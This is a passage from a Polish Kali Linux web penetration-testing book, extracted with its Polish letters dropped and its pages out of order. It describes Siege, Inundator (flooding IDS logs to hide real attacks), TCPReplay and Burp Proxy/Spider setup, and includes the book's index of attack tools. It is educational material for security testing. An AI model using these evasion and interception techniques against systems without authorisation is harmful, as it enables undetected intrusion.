SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 16: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

